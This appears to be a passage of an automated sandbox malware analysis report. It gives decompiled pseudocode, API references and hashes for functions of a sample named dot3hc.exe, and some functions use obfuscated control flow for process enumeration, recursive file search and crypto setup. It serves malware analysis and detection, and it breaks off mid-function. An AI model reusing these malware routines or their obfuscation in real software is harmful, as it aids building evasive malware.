Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: __invoke_watson$ExitProcess_strcpy_s_strlen$FileModuleName___crt
String ID: |hD
API String ID: 4122421049-2118069248
Opcode ID: eb0fc998651eac4c209a840669decf8684686f75d9fb24df06ed1deb8ad2b860
Instruction ID: e70cd8b630b281eaa6359728f90183fb7d6d66781cb960f2164c911ee12c87e2
Opcode Fuzzy Hash: eb0fc998651eac4c209a840669decf8684686f75d9fb24df06ed1deb8ad2b860
Instruction Fuzzy Hash: 9EC08CB12147103AD600BB12A80391D22608F00B24F22843FF008140D2DB398580600E

Uniqueness

Uniqueness Score: -1.00%

Function 0040F496, Relevance: 5.1, APIs: 4, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E0040F496(long* __ecx, intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t31;
				intOrPtr _t32;
				signed int _t38;
				struct _CRITICAL_SECTION* _t39;
				intOrPtr* _t44;
				long* _t47;
				intOrPtr* _t50;

				_push(__ecx);
				_t50 = _a4;
				_t38 = 1;
				_t47 = __ecx;
				_v8 = 1;
				if( *((intOrPtr*)(_t50 + 8)) <= 1) {
					L10:
					_t39 =  &(_t47[7]);
					EnterCriticalSection(_t39);
					E0040F149( &(_t47[5]), _t50);
					LeaveCriticalSection(_t39);
					LocalFree( *(_t50 + 0xc));
					 *((intOrPtr*)( *_t50))(1);
					_t31 = TlsSetValue( *_t47, 0);
					L11:
					return _t31;
				} else {
					goto L1;
				}
				do {
					L1:
					_t32 = _a8;
					if(_t32 == 0 ||  *((intOrPtr*)(_t47[4] + 4 + _t38 * 8)) == _t32) {
						_t44 =  *((intOrPtr*)( *(_t50 + 0xc) + _t38 * 4));
						if(_t44 != 0) {
							 *((intOrPtr*)( *_t44))(1);
						}
						_t31 =  *(_t50 + 0xc);
						 *(_t31 + _t38 * 4) =  *(_t31 + _t38 * 4) & 0x00000000;
					} else {
						_t31 =  *(_t50 + 0xc);
						if( *(_t31 + _t38 * 4) != 0) {
							_v8 = _v8 & 0x00000000;
						}
					}
					_t38 = _t38 + 1;
				} while (_t38 <  *((intOrPtr*)(_t50 + 8)));
				if(_v8 == 0) {
					goto L11;
				}
				goto L10;
			}

0x0040f499
0x0040f49e
0x0040f4a1
0x0040f4a6
0x0040f4a8
0x0040f4ab
0x0040f4ef
0x0040f4ef
0x0040f4f3
0x0040f4fd
0x0040f503
0x0040f50c
0x0040f518
0x0040f51e
0x0040f524
0x0040f528
0x00000000
0x00000000
0x00000000
0x0040f4ad
0x0040f4ad
0x0040f4ad
0x0040f4b2
0x0040f4cf
0x0040f4d4
0x0040f4da
0x0040f4da
0x0040f4dc
0x0040f4df
0x0040f4bd
0x0040f4bd
0x0040f4c4
0x0040f4c6
0x0040f4c6
0x0040f4c4
0x0040f4e3
0x0040f4e4
0x0040f4ed
0x00000000
0x00000000
0x00000000

APIs

EnterCriticalSection.KERNEL32(?), ref: 0040F4F3
LeaveCriticalSection.KERNEL32(?,?), ref: 0040F503
LocalFree.KERNEL32(?), ref: 0040F50C
TlsSetValue.KERNEL32(?,00000000), ref: 0040F51E

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: CriticalSection$EnterFreeLeaveLocalValue
String ID:
API String ID: 2949335588-0
Opcode ID: 9485fa99e575f6fba2d3db258f94ccea0763652fbd318a00cc68c60fcce8b19c
Instruction ID: 2b8ded7cbabb034d170cb8e1f6a20b40d79b2ab9c9a6a536b212b17957fcc661
Opcode Fuzzy Hash: 9485fa99e575f6fba2d3db258f94ccea0763652fbd318a00cc68c60fcce8b19c
Instruction Fuzzy Hash: E8117935600604EFD720CF54D888BAAB7B4FF55315F10843AE9469BAA2CB74B984CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040FA7F, Relevance: 5.0, APIs: 4, Instructions: 37
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 82%

			E0040FA7F(void* __ebx, void* __esi, void* __ebp, signed int _a4) {
				void* __edi;
				struct _CRITICAL_SECTION* _t4;
				void* _t7;
				void* _t10;
				signed int _t11;
				void* _t14;
				intOrPtr* _t15;
				void* _t17;

				_t17 = __ebp;
				_t14 = __esi;
				_t7 = __ebx;
				_t11 = _a4;
				_t20 = _t11 - 0x11;
				if(_t11 >= 0x11) {
					_t4 = E004037E3(__ebx, _t10, _t11, __esi, _t20);
				}
				if( *0x44660c == 0) {
					_t4 = E0040FA16();
				}
				_push(_t7);
				_push(_t17);
				_push(_t14);
				_t15 = 0x4467c0 + _t11 * 4;
				if( *_t15 == 0) {
					EnterCriticalSection(0x4467a8);
					if( *_t15 == 0) {
						_t4 = 0x446610 + _t11 * 0x18;
						InitializeCriticalSection(_t4);
						 *_t15 =  *_t15 + 1;
					}
					LeaveCriticalSection(0x4467a8);
				}
				EnterCriticalSection(0x446610 + _t11 * 0x18);
				return _t4;
			}

0x0040fa7f
0x0040fa7f
0x0040fa7f
0x0040fa80
0x0040fa84
0x0040fa87
0x0040fa89
0x0040fa89
0x0040fa95
0x0040fa97
0x0040fa97
0x0040fa9c
0x0040faa3
0x0040faa4
0x0040faa5
0x0040fab4
0x0040fabb
0x0040fac0
0x0040fac7
0x0040faca
0x0040fad0
0x0040fad0
0x0040fad7
0x0040fad7
0x0040fae3
0x0040fae9

APIs

EnterCriticalSection.KERNEL32(004467A8,?,?,?,?,0040F0BE,00000010,00000008,0040DBC2,0040DB65,004037FD,004048F5,?,00404F86,00000004,004044D3), ref: 0040FABB
InitializeCriticalSection.KERNEL32(?,?,?,?,?,0040F0BE,00000010,00000008,0040DBC2,0040DB65,004037FD,004048F5,?,00404F86,00000004,004044D3), ref: 0040FACA
LeaveCriticalSection.KERNEL32(004467A8,?,?,?,?,0040F0BE,00000010,00000008,0040DBC2,0040DB65,004037FD,004048F5,?,00404F86,00000004,004044D3), ref: 0040FAD7
EnterCriticalSection.KERNEL32(?,?,?,?,?,0040F0BE,00000010,00000008,0040DBC2,0040DB65,004037FD,004048F5,?,00404F86,00000004,004044D3), ref: 0040FAE3

Part of subcall function 004037E3: __CxxThrowException@8.LIBCMT ref: 004037F7
Part of subcall function 004037E3: __EH_prolog3.LIBCMT ref: 00403804

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: CriticalSection$Enter$Exception@8H_prolog3InitializeLeaveThrow
String ID:
API String ID: 2895727460-0
Opcode ID: 8525257333676ca08d676e7b2a81b6225231d4ca005925c9b4ed6641576d303d
Instruction ID: 11894b6c2aef66c6a57d0d31d06213815613db8dfd1157861ab68b14672cec20
Opcode Fuzzy Hash: 8525257333676ca08d676e7b2a81b6225231d4ca005925c9b4ed6641576d303d
Instruction Fuzzy Hash: CDF0F6B72001049BDB205F98EC44759B799EBE3319F13103BE04092591DB7D55848E6E

Uniqueness

Uniqueness Score: -1.00%

Function 0040F03C, Relevance: 5.0, APIs: 4, Instructions: 31
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0040F03C(long* __ecx, signed int _a4) {
				void* _t9;
				struct _CRITICAL_SECTION* _t12;
				signed int _t14;
				long* _t16;

				_t16 = __ecx;
				_t1 =  &(_t16[7]); // 0x4465f0
				_t12 = _t1;
				EnterCriticalSection(_t12);
				_t14 = _a4;
				if(_t14 <= 0) {
					L5:
					LeaveCriticalSection(_t12);
					return 0;
				}
				_t3 =  &(_t16[3]); // 0x3
				if(_t14 >=  *_t3) {
					goto L5;
				}
				_t9 = TlsGetValue( *_t16);
				if(_t9 == 0 || _t14 >=  *((intOrPtr*)(_t9 + 8))) {
					goto L5;
				} else {
					LeaveCriticalSection(_t12);
					return  *((intOrPtr*)( *((intOrPtr*)(_t9 + 0xc)) + _t14 * 4));
				}
			}

0x0040f03e
0x0040f041
0x0040f041
0x0040f045
0x0040f04b
0x0040f051
0x0040f07a
0x0040f07b
0x00000000
0x0040f081
0x0040f053
0x0040f056
0x00000000
0x00000000
0x0040f05a
0x0040f062
0x00000000
0x0040f069
0x0040f070
0x00000000
0x0040f076

APIs

EnterCriticalSection.KERNEL32(004465F0,?,?,?,0040F5EB,?,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004,004044D3,00000004,00401181), ref: 0040F045
TlsGetValue.KERNEL32(004465D4,?,?,?,0040F5EB,?,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004,004044D3,00000004,00401181), ref: 0040F05A
LeaveCriticalSection.KERNEL32(004465F0,?,?,?,0040F5EB,?,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004,004044D3,00000004,00401181), ref: 0040F070
LeaveCriticalSection.KERNEL32(004465F0,?,?,?,0040F5EB,?,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004,004044D3,00000004,00401181), ref: 0040F07B

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: CriticalSection$Leave$EnterValue
String ID:
API String ID: 3969253408-0
Opcode ID: 9a40517444bb365cbe8405af2ef5f1505744aac530f5d2e3c0f55a5ba20e43c5
Instruction ID: 60d108fa28f27cf260cddbd5588e553d64dca512099a42e32762409037fd1fc8
Opcode Fuzzy Hash: 9a40517444bb365cbe8405af2ef5f1505744aac530f5d2e3c0f55a5ba20e43c5
Instruction Fuzzy Hash: 7FF0F47A200A009FC6308F64DC48D5A77A9EAD4351316957BE442A3562DA78F989CA54

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: dot3hc.exe PID: 5536 Parent PID: 2944 dot3hc.exeCOMMON

Execution Graph

Execution Coverage:	5%
Dynamic/Decrypted Code Coverage:	27.6%
Signature Coverage:	2%
Total number of Nodes:	1058
Total number of Limit Nodes:	107

Executed Functions

Function 022E1030, Relevance: 18.4, APIs: 12, Instructions: 362
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(022E4054,022E4040), ref: 022E1047
GetProcAddress.KERNEL32(00000000), ref: 022E104E

Part of subcall function 022E1B30: SetLastError.KERNEL32(0000000D,?,022E1070,?,00000040), ref: 022E1B3D

SetLastError.KERNEL32(000000C1), ref: 022E1096

Memory Dump Source

Source File: 00000003.00000002.615064004.00000000022E1000.00000020.00000001.sdmp, Offset: 022E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22e1000_dot3hc.jbxd

Similarity

API ID: ErrorLast$AddressLibraryLoadProc
String ID:
API String ID: 1866314245-0
Opcode ID: 4522218bb593ac208d7f70df3b51fd8836bb3b0be9fba2ca95531e3a30a55776
Instruction ID: 1946cf4ce3add3ce5b42a34c22e761c02035915234359ad41969f33bbb089c75
Opcode Fuzzy Hash: 4522218bb593ac208d7f70df3b51fd8836bb3b0be9fba2ca95531e3a30a55776
Instruction Fuzzy Hash: D7F1E6B4E10209EFDF04DF94D984AAEB7B1AF48304F5085A8E90AAB345D770EE51DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00403F0B, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70
libraryCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00403F0B(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, int _a4) {
				signed int _v8;
				char _v284;
				char _v288;
				void* __esi;
				void* __ebp;
				signed int _t9;
				struct HINSTANCE__* _t12;
				intOrPtr* _t18;
				intOrPtr _t26;
				void* _t27;
				intOrPtr _t33;
				signed int _t34;
				intOrPtr _t35;
				signed int _t36;
				void* _t37;

				_t33 = __edi;
				_t32 = __edx;
				_t28 = __ecx;
				_t26 = __ebx;
				_t9 =  *0x443590; // 0x8ffedb05
				_v8 = _t9 ^ _t36;
				_t39 = _a4 - 0x800;
				_t35 = __ecx;
				if(_a4 != 0x800) {
					_t12 = GetLocaleInfoA(_a4, 3,  &_v288, 4); // executed
					__eflags = _t12;
					if(__eflags != 0) {
						goto L2;
					} else {
					}
				} else {
					_push(E0041FC1E(__edx,  &_v288, 4, "LOC"));
					E00402F17(__ebx, _t28, __edi, _t35);
					_t37 = _t37 + 0x10;
					L2:
					_push(_t26);
					_push(_t33);
					_t34 =  *(E0041F8D2(_t39));
					 *(E0041F8D2(_t39)) =  *_t14 & 0x00000000;
					_t35 = 0x112;
					_t27 = E0041FC9F( &_v284, 0x112, 0x111, 0x112,  &_v288);
					_t18 = E0041F8D2(_t39);
					_t40 =  *_t18;
					if( *_t18 == 0) {
						 *(E0041F8D2(__eflags)) = _t34;
					} else {
						E004031BC( *((intOrPtr*)(E0041F8D2(_t40))));
					}
					if(_t27 == 0xffffffff || _t27 >= _t35) {
						_t12 = 0;
						__eflags = 0;
					} else {
						_t12 = LoadLibraryA( &_v284); // executed
					}
					_pop(_t33);
					_pop(_t26);
				}
				return E0041E5DF(_t12, _t26, _v8 ^ _t36, _t32, _t33, _t35);
			}

APIs

_strcpy_s.LIBCMT ref: 00403F38

Part of subcall function 00402F17: __CxxThrowException@8.LIBCMT ref: 004037F7
Part of subcall function 00402F17: __EH_prolog3.LIBCMT ref: 00403804

Part of subcall function 0041F8D2: __getptd_noexit.LIBCMT ref: 0041F8D2

__snprintf_s.LIBCMT ref: 00403F71

Part of subcall function 0041FC9F: __vsnprintf_s_l.LIBCMT ref: 0041FCB4

GetLocaleInfoA.KERNELBASE(00000800,00000003,?,00000004), ref: 00403F9C
LoadLibraryA.KERNELBASE(?), ref: 00403FBF

Strings

LOC, xrefs: 00403F30

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: Exception@8H_prolog3InfoLibraryLoadLocaleThrow__getptd_noexit__snprintf_s__vsnprintf_s_l_strcpy_s
String ID: LOC
API String ID: 4018564869-519433814
Opcode ID: 124329ac7b5173beeb4f80da07e0245dcef33f898aea0afbead4e6b8adcc6ca7
Instruction ID: a958a6fff790820a8ed6774035e13ca5e81909a58661fe9e0dffe607a1d70840
Opcode Fuzzy Hash: 124329ac7b5173beeb4f80da07e0245dcef33f898aea0afbead4e6b8adcc6ca7
Instruction Fuzzy Hash: D811A8719102086AD714BF61CC46BDE36BCAF01719F1000B7B504BB1D1EB7C9E9A8B99

Uniqueness

Uniqueness Score: -1.00%

Function 02303686, Relevance: 6.1, APIs: 4, Instructions: 90
processCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E02303686(intOrPtr* __ecx, void* __edx) {
				void* _v556;
				void* _v560;
				void* _t6;
				int _t9;
				int _t11;
				signed int _t13;
				signed int _t15;
				signed int _t17;
				void* _t20;
				intOrPtr* _t21;
				void* _t36;
				void* _t37;

				_t37 = _v560;
				_t21 = __ecx;
				_t36 = __edx;
				_t6 = 0xf9a9043;
				do {
					while(_t6 != 0xf5e4533) {
						if(_t6 == 0xf9a9043) {
							_t6 = 0x2b8fd175;
							continue;
						}
						if(_t6 == 0x200a1826) {
							E02302F84(0xf568ce83, 0x2e998fdc, 0x167);
							_t11 = FindCloseChangeNotification(_t37); // executed
							return _t11;
						}
						if(_t6 == 0x2495f148) {
							_v556 = 0x22c;
							_t13 = E02302F84(0xf568ce83, 0x16cdffc9, 6);
							Process32FirstW(_t37,  &_v556); // executed
							asm("sbb eax, eax");
							_t15 =  ~_t13 & 0x05a167eb;
							L10:
							_t6 = _t15 + 0x200a1826;
							continue;
						}
						if(_t6 == 0x25ab8011) {
							_t17 =  *_t21( &_v556, _t36);
							asm("sbb eax, eax");
							_t15 =  ~_t17 & 0xef542d0d;
							goto L10;
						}
						if(_t6 != 0x2b8fd175) {
							goto L16;
						}
						E02302F84(0xf568ce83, 0xb1495a04, 0x1ec);
						_t20 = CreateToolhelp32Snapshot(2, 0); // executed
						_t37 = _t20;
						if(_t37 != 0xffffffff) {
							_t6 = 0x2495f148;
							continue;
						}
						return _t20;
						L20:
					}
					E02302F84(0xf568ce83, 0xb8b5c52a, 0x1e0);
					_t9 = Process32NextW(_t37,  &_v556); // executed
					if(_t9 == 0) {
						_t6 = 0x200a1826;
						goto L16;
					} else {
						_t6 = 0x25ab8011;
						continue;
					}
					goto L20;
					L16:
				} while (_t6 != 0x14c42a61);
				return _t6;
			}

0x0230368f
0x02303693
0x02303696
0x02303698
0x023036a2
0x023036a2
0x023036b2
0x02303748
0x00000000
0x02303748
0x023036ba
0x0230379c
0x023037a2
0x00000000
0x023037a2
0x023036c5
0x0230371f
0x02303735
0x0230373b
0x0230373f
0x02303741
0x02303717
0x02303717
0x00000000
0x02303717
0x023036cc
0x0230370c
0x02303710
0x02303712
0x00000000
0x02303712
0x023036d3
0x00000000
0x00000000
0x023036ec
0x023036f2
0x023036f4
0x023036f9
0x023036ff
0x00000000
0x023036ff
0x023037ae
0x00000000
0x023037ae
0x02303767
0x0230376d
0x02303771
0x0230377d
0x00000000
0x02303773
0x02303773
0x00000000
0x02303773
0x00000000
0x0230377f
0x0230377f
0x00000000

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 023036F2
Process32FirstW.KERNEL32(?,?), ref: 0230373B
Process32NextW.KERNEL32(?,?,00000000,?,?,?), ref: 0230376D
FindCloseChangeNotification.KERNELBASE(?), ref: 023037A2

Memory Dump Source

Source File: 00000003.00000002.615127704.0000000002301000.00000020.00000001.sdmp, Offset: 02300000, based on PE: true

Associated: 00000003.00000002.615121787.0000000002300000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.615142665.0000000002309000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2300000_dot3hc.jbxd

Similarity

API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
String ID:
API String ID: 3243318325-0
Opcode ID: 43dfefde8e68e6bc9e6e3de67243cdd9adc619014dcdd61889de87363c02cb4b
Instruction ID: 8a11a2d8bb9a2a885b9d7371dc600ead8b0cd83fd3c0add721a1678e15b152df
Opcode Fuzzy Hash: 43dfefde8e68e6bc9e6e3de67243cdd9adc619014dcdd61889de87363c02cb4b
Instruction Fuzzy Hash: EC219B6138421657E63865F89CF8F7B6199CF94AA8F240956BD12CB3C0CB29DD45C2B2

Uniqueness

Uniqueness Score: -1.00%

Function 023028FB, Relevance: 4.6, APIs: 3, Instructions: 139
fileCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E023028FB(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				short _v524;
				char _v1044;
				short _v1588;
				short _v1590;
				struct _WIN32_FIND_DATAW _v1636;
				void* _v1640;
				void* _t21;
				void* _t22;
				int _t28;
				signed int _t31;
				signed int _t33;
				signed int _t35;
				void* _t47;
				void* _t48;
				void* _t50;
				void* _t75;
				void* _t78;
				void* _t79;

				_t75 = _v1640;
				_t48 = __edx;
				_t78 = __ecx;
				_t21 = 0xe3051c;
				while(1) {
					L1:
					_t50 = 0x2e;
					do {
						L2:
						while(_t21 != 0xe3051c) {
							if(_t21 == 0x57934ae) {
								_t22 = E02302674(0x2309190);
								_push(_t78);
								_t76 = _t22;
								_push(_t22);
								_push(0x104);
								_push( &_v524);
								 *((intOrPtr*)(E02302F84(0xa83808e5, 0xb436274a, 0x156)))();
								_t79 = _t79 + 0x10;
								E02302FDF(_t76);
								_t21 = 0x3a3f7db0;
								while(1) {
									L1:
									_t50 = 0x2e;
									goto L2;
								}
							}
							if(_t21 == 0xfc52714) {
								E02302F84(0xf568ce83, 0xdc33dcc3, 0x19d);
								_t28 = FindClose(_t75); // executed
								return _t28;
							}
							if(_t21 == 0x29ccb448) {
								E02302F84(0xf568ce83, 0xab7da153, 0x55);
								_t31 = FindNextFileW(_t75,  &_v1636); // executed
								asm("sbb eax, eax");
								_t33 =  ~_t31 & 0x1aaf748c;
								L19:
								_t21 = _t33 + 0xfc52714;
								while(1) {
									L1:
									_t50 = 0x2e;
									goto L2;
								}
							}
							if(_t21 == 0x2a749ba0) {
								if((_v1636.dwFileAttributes & 0x00000010) == 0) {
									_t35 = _a4( &_v1636, _a8);
									asm("sbb eax, eax");
									_t33 =  ~_t35 & 0x1a078d34;
									goto L19;
								}
								if(_v1636.cFileName != _t50 || _v1590 != 0 && (_v1590 != _t50 || _v1588 != 0)) {
									if(_t48 != 0) {
										_t77 = E02302674(0x23091c0);
										_push( &(_v1636.cFileName));
										_push(_t78);
										_push(0x104);
										_push( &_v1044);
										 *((intOrPtr*)(E02302F84(0xa83808e5, 0xb436274a, 0x156)))();
										_t79 = _t79 + 0x14;
										E023028FB( &_v1044, _t48, _a4, _a8);
										E02302FDF(_t77);
										_t50 = 0x2e;
									}
								}
								_t21 = 0x29ccb448;
								continue;
							}
							if(_t21 != 0x3a3f7db0) {
								goto L23;
							}
							E02302F84(0xf568ce83, 0x8da84b58, 0x158);
							_t47 = FindFirstFileW( &_v524,  &_v1636); // executed
							_t75 = _t47;
							if(_t75 == 0xffffffff) {
								return _t47;
							}
							_t21 = 0x2a749ba0;
							goto L1;
						}
						_t21 = 0x57934ae;
						L23:
					} while (_t21 != 0x3178f15b);
					return _t21;
				}
			}

0x02302905
0x02302909
0x0230290b
0x0230290d
0x02302912
0x02302912
0x02302914
0x02302915
0x00000000
0x02302915
0x02302925
0x02302a74
0x02302a79
0x02302a7a
0x02302a81
0x02302a82
0x02302a93
0x02302a9f
0x02302aa1
0x02302aa6
0x02302aab
0x02302912
0x02302912
0x02302914
0x00000000
0x02302914
0x02302912
0x02302930
0x02302ad7
0x02302add
0x00000000
0x02302add
0x0230293b
0x02302a5c
0x02302a62
0x02302a66
0x02302a68
0x02302a40
0x02302a40
0x02302912
0x02302912
0x02302914
0x00000000
0x02302914
0x02302912
0x02302946
0x0230298e
0x02302a30
0x02302a39
0x02302a3b
0x00000000
0x02302a3b
0x02302999
0x023029be
0x023029ca
0x023029da
0x023029db
0x023029dd
0x023029e9
0x023029f5
0x023029f7
0x02302a11
0x02302a1a
0x02302a21
0x02302a21
0x023029be
0x023029b2
0x00000000
0x023029b2
0x0230294d
0x00000000
0x00000000
0x0230296f
0x02302975
0x02302977
0x0230297c
0x02302ae9
0x02302ae9
0x02302982
0x00000000
0x02302982
0x02302ab5
0x02302aba
0x02302aba
0x00000000
0x02302915

APIs

FindFirstFileW.KERNELBASE(?,?), ref: 02302975
FindNextFileW.KERNELBASE(?,?), ref: 02302A62
FindClose.KERNELBASE(?), ref: 02302ADD

Memory Dump Source

Source File: 00000003.00000002.615127704.0000000002301000.00000020.00000001.sdmp, Offset: 02300000, based on PE: true

Associated: 00000003.00000002.615121787.0000000002300000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.615142665.0000000002309000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2300000_dot3hc.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 45f95acd56c1fb121fff134b48412b39a2892231906085a1dcee7a86d7ba6a36
Instruction ID: 9b8d86044888946c7e726b90eaf97a9596da5bbc0a7921563c70066fc0ac4140
Opcode Fuzzy Hash: 45f95acd56c1fb121fff134b48412b39a2892231906085a1dcee7a86d7ba6a36
Instruction Fuzzy Hash: EF416720A083015BDA38A66888ECBBB62BACBD4314F04091AFD51C72C1DF76C994C773

Uniqueness

Uniqueness Score: -1.00%

Function 02301DEC, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 182
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E02301DEC() {
				char _v4;
				char _v8;
				intOrPtr _v32;
				void* __ecx;
				void* _t19;
				signed int _t22;
				signed int _t28;
				void* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr _t47;
				void* _t64;
				void* _t76;
				signed int _t78;
				void* _t88;

				_t45 = _t46;
				_t78 = 0x11df9f4a;
				_t76 = 0;
				while(1) {
					L1:
					_t47 =  *0x230a4bc; // 0x5b4c50
					do {
						while(1) {
							L2:
							_t88 = _t78 - 0x15231901;
							if(_t88 > 0) {
								break;
							}
							if(_t88 == 0) {
								_push( &_v4);
								_push( &_v8);
								_push(_t76);
								_push(0x8000);
								_push( *((intOrPtr*)(_t45 + 4)));
								_push( *_t45);
								_push(0x13);
								_push(0x10001);
								_t28 =  *((intOrPtr*)(E02302F84(0x76ea1e12, 0xd0a2c212, 0x1d7)))(); // executed
								asm("sbb esi, esi");
								_t78 = ( ~_t28 & 0xe96b696f) + 0x23ab6912;
								while(1) {
									L1:
									_t47 =  *0x230a4bc; // 0x5b4c50
									goto L2;
								}
							} else {
								if(_t78 == 0xb67f30a) {
									_t8 = _t47 + 4; // 0x5b4c54
									_push(_t76);
									_push(_t76);
									_push(0x8004);
									_push( *((intOrPtr*)(_t47 + 0x20)));
									_t31 =  *((intOrPtr*)(E02302F84(0x4836b0ed, 0x3901c464, 0x21a)))(); // executed
									if(_t31 != 0) {
										_t76 = 1;
									} else {
										_t78 = 0x132dd04d;
										while(1) {
											L1:
											_t47 =  *0x230a4bc; // 0x5b4c50
											goto L2;
										}
									}
								} else {
									if(_t78 == 0xd16d281) {
										_t3 = _t47 + 0xc; // 0x5b4c5c
										_push(_t76);
										_push(_t76);
										_push(_v4);
										_push(_v8);
										_push( *((intOrPtr*)(_t47 + 0x20)));
										 *((intOrPtr*)(E02302F84(0x4836b0ed, 0xd3359e70, 0xa4)))(); // executed
										_push(_v32);
										asm("sbb esi, esi");
										_t78 = (_t78 & 0xf961461b) + 0x23ab6912;
										 *((intOrPtr*)(E02302F84(0xf568ce83, 0x70673eb, 0x90)))();
										L28:
										_t47 =  *0x230a4bc; // 0x5b4c50
										goto L29;
									} else {
										if(_t78 == 0xe3d60f3) {
											_push( *((intOrPtr*)(_t47 + 0xc)));
											 *((intOrPtr*)(E02302F84(0x4836b0ed, 0x1802ec4f, 0x248)))();
											_t78 = 0x23ab6912;
											while(1) {
												L1:
												_t47 =  *0x230a4bc; // 0x5b4c50
												goto L2;
											}
										} else {
											if(_t78 == 0x11df9f4a) {
												_t64 = 0x28;
												_t47 = E02303037(_t64);
												 *0x230a4bc = _t47;
												if(_t47 != 0) {
													_t78 = 0x1c9fb854;
													continue;
												}
											} else {
												if(_t78 != 0x132dd04d) {
													goto L29;
												} else {
													_push( *((intOrPtr*)(_t47 + 0x10)));
													 *((intOrPtr*)(E02302F84(0x4836b0ed, 0x1802ec4f, 0x248)))();
													_t78 = 0xe3d60f3;
													while(1) {
														L1:
														_t47 =  *0x230a4bc; // 0x5b4c50
														goto L2;
													}
												}
											}
										}
									}
								}
							}
							L22:
							return _t76;
						}
						if(_t78 == 0x1c9fb854) {
							_push(0xf0000040);
							_push(0x18);
							_push(_t76);
							_t16 = _t47 + 0x20; // 0x5b4c70
							_push(_t76);
							_t19 =  *((intOrPtr*)(E02302F84(0x4836b0ed, 0x5c0bdb4c, 0x15)))(); // executed
							if(_t19 == 0) {
								_t78 = 0x2dd1fc81;
								goto L28;
							} else {
								_t78 = 0x15231901;
								goto L1;
							}
						} else {
							if(_t78 == 0x1d0caf2d) {
								_t14 = _t47 + 0x10; // 0x5b4c60
								_push(1);
								_push(0x660e);
								_push( *((intOrPtr*)(_t47 + 0x20)));
